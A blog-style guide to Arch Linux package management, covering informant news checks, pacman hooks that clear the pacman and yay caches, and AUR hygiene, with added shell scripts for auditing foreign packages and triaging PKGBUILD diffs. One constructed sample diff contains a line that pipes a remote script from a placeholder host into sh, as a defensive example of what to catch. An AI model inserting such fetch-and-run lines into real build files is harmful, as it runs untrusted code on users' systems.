Arch Linux package management is great, but there are a few things I had to change to fit my workflow. They are listed here.

Force yourself to read Arch news before upgrading

Arch Linux will sometimes ship package updates that require manual intervention or outright break systems. Off the top of my head, I can think of a grub update breaking my system in 2022, or linux-firmware in 2025.
While these breakages are rare, they do happen, and Arch Linux expects you to read the Arch News before upgrading and to be aware of them.

The informant package (available in the AUR) enforces this: it ships a pacman hook that aborts the transaction whenever an Arch news item has been published that you have not yet marked as read.
After installing it, add yourself to the informant group with sudo usermod -aG informant $USER (so you can read and mark news items without root; log out and back in for the group change to take effect). From then on informant checks for new Arch news whenever you run an upgrade and stops it if there is something unread; once you have read the item, mark it with informant read and run the upgrade again.

Automatically clear the package cache

By default, pacman keeps every package file it has ever downloaded, and yay keeps the build directory of every AUR package it has built. Neither is cleaned automatically, so both grow without bound.

pacman

pacman stores downloaded packages in /var/cache/pacman/pkg/. The cache can be cleared with paccache (from the pacman-contrib package): paccache -r -k0 removes every cached file. To run that automatically after each transaction, we can use the following pacman hook:
/etc/pacman.d/hooks/autoclean-pacman.hook

[Trigger]
Operation = Upgrade
Operation = Install
Type = Package
Target = *

[Action]
Description = Keep nothing in pacman cache
When = PostTransaction
Exec = /usr/bin/paccache -r -k0

If you want to keep the last N versions of each package in the cache, change -k0 to -kN (paccache's default, when -k is not given, is 3). Keeping one or two versions preserves the ability to downgrade a package with pacman -U from the cache after a bad update like the ones mentioned above; with -k0 that safety net is gone, so pick the value deliberately. Note that the hook runs as root after every install or upgrade, like every pacman hook, so keep the hook file owned by root and not writable by other users.

yay

yay stores its AUR cache (the cloned package repositories and their build artifacts) in a per-user directory, ~/.cache/yay/. Clearing it automatically is harder: yay has no hook mechanism of its own, and pacman hooks run as root, so ~ does not point to your home directory.

Thankfully, since yay invokes pacman through sudo, the SUDO_USER environment variable (set by sudo and inherited by pacman's hooks) tells the hook which user started the transaction, and su can switch back to that user.
Here is what the corresponding hook looks like:
/etc/pacman.d/hooks/autoclean-yay.hook

[Trigger]
Operation = Upgrade
Operation = Install
Type = Package
Target = *

[Action]
Description = Keep nothing in yay AUR cache
When = PostTransaction
Exec = /usr/bin/sh -c '[ -z "$SUDO_USER" ] || [ "$SUDO_USER" = root ] || su "$SUDO_USER" -c "yay -Sc --aur --noconfirm"'

The two guards matter: when pacman is run directly as root (no sudo), SUDO_USER is unset, and an unquoted, empty su $SUDO_USER would run yay as root, which yay refuses to do, leaving a failed hook after every transaction. Also keep in mind that this hook fires on every pacman transaction, not only on those started by yay.

AUR hygiene

As you probably already know, AUR packages are maintained by users. This means anyone can create or update a package with malicious content that you would then build and run on your computer, potentially as soon as you install it: makepkg runs the PKGBUILD's functions as your user during the build, and the package's .install script runs as root when pacman installs it.

There are steps you can take to limit this:

Limit your usage of the AUR

You should only install AUR packages when no other source is available. Prefer official Arch packages whenever they exist.
Alternatively, look for an official AppImage or Flatpak, or an AUR package maintained by the software's author.

The key here is to limit the number of parties you trust. Since you intend to install the author's software, you already trust them not to give you malicious code; using them as the package source as well adds no new party to that trust, whereas a third-party AUR maintainer is an extra one.

You should also periodically review the AUR packages you have installed with pacman -Qm, which lists every installed package that no configured repository provides, and check whether any of them has since been added to the official repositories.
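As an added example (not code from the original post), here is a small POSIX shell script that turns that periodic review into a check: it reads the output of pacman -Qm and reports which foreign packages the official repositories now provide, so they can be reinstalled from there. repo_has wraps pacman -Si, which only reads the local sync databases (refreshed by your regular -Syu) and therefore needs no network; the function names are this example's own.

```shell
#!/bin/sh
# Added example, not part of the original post: find "foreign" packages
# (pacman -Qm: installed but absent from every sync repo, i.e. mostly AUR)
# that the official repositories have since started to provide.

# Ask the sync databases whether they carry a package of this exact name.
# Kept as a separate function so it can be replaced by a stub when testing
# on a machine without pacman.
repo_has() {
    pacman -Si -- "$1" >/dev/null 2>&1
}

# Read "name version" lines (the format of `pacman -Qm`) on stdin and print
# "official <name>" when a sync repo now provides the package, otherwise
# "aur <name>". Blank lines are ignored.
classify_foreign() {
    while read -r name _version; do
        [ -n "$name" ] || continue
        if repo_has "$name"; then
            printf 'official %s\n' "$name"
        else
            printf 'aur %s\n' "$name"
        fi
    done
}

# Print only the names that should be migrated to the official package.
now_in_repos() {
    classify_foreign | awk '$1 == "official" { print $2 }'
}

# Usage on a real system:
#   pacman -Qm | now_in_repos
```

A package listed by now_in_repos can be switched to the official build with a plain pacman -S of its name; pacman replaces the foreign version with the repository one.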

Review changes to AUR packages

When installing or updating an AUR package, yay asks whether you want to review the diff of the package files since the last build. To make sure you always see the changes, configure yay to show the diff automatically:
~/.config/yay/config.json

{
  "answerdiff": "a"
}

A well-behaved AUR package (leaving aside packages whose program itself lives in the AUR repository, so that every update carries real code changes) should change only lightly most of the time: the version and the checksums. That keeps the diff quick to review and makes any unexpected change, such as a new source URL or a new function in the PKGBUILD, stand out.

Pro-tip: I also set "answerclean": "n" to skip the second prompt (whether to clean the build directory before building).
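As an added example (not code from the original post or from yay), the following POSIX shell script applies the "version and checksums only" rule mechanically: it reads a unified diff of a PKGBUILD on stdin, lets through lines that only change pkgver, pkgrel or a checksum array, prints every other added or removed line for you to read, and exits non-zero in that case. The two sample diffs and the function names are constructed for this example. It is a coarse filter meant to focus attention, not a replacement for reading the diff; in particular a change to a source= line is deliberately reported.

```shell
#!/bin/sh
# Added example, not part of the original post: separate a routine AUR
# version bump from a diff that needs a human to read it.

# Lines that may change without comment in a routine bump: the version and
# release fields, checksum arrays (with any _arch suffix) and the quoted
# hex strings or 'SKIP' entries that continue such an array.
HEX="'([0-9a-fA-F]+|SKIP)'"
ROUTINE_RE="^pkgver=[A-Za-z0-9._+]+\$|^pkgrel=[0-9]+\$|^(md5|sha1|sha224|sha256|sha384|sha512|b2)sums(_[a-z0-9_]+)?=\(($HEX[[:space:]]*)*\)?\$|^[[:space:]]*$HEX\)?\$"

# Read a unified diff on stdin. Keep only added/removed lines (not the
# ---/+++ file headers), drop the routine ones, print the rest with their
# +/- marker. Exit 0 when nothing is left, 1 when the diff needs review.
triage_pkgbuild_diff() {
    suspicious=$(grep -E '^[+-]' | grep -Ev '^(\+\+\+|---) ' | while IFS= read -r line; do
        body=${line#?}                       # strip the leading + or -
        printf '%s\n' "$body" | grep -Eq "$ROUTINE_RE" || printf '%s\n' "$line"
    done)
    [ -z "$suspicious" ] && return 0
    printf '%s\n' "$suspicious"
    return 1
}

# Constructed sample: a plain version bump, the shape most AUR updates have.
sample_routine_diff() {
    cat <<'EOF'
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -1,6 +1,6 @@
 pkgname=example-tool
-pkgver=1.4.0
+pkgver=1.4.1
 pkgrel=1
 source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
-sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef')
+sha256sums=('fedcba9876543210fedcba9876543210fedcba9876543210fedcba9876543210')
EOF
}

# Constructed sample: the same bump plus a new prepare() that pipes a remote
# script into sh, the kind of addition that must be read before building.
sample_suspicious_diff() {
    sample_routine_diff
    cat <<'EOF'
+prepare() {
+  curl -fsSL https://example.invalid/helper.sh | sh
+}
EOF
}
```

On a real package, feed it the output of git diff from the package's clone under ~/.cache/yay/ (yay keeps each AUR package as a git checkout there). The sample_routine_diff input produces no output and exit status 0; sample_suspicious_diff prints the three prepare() lines and exits 1.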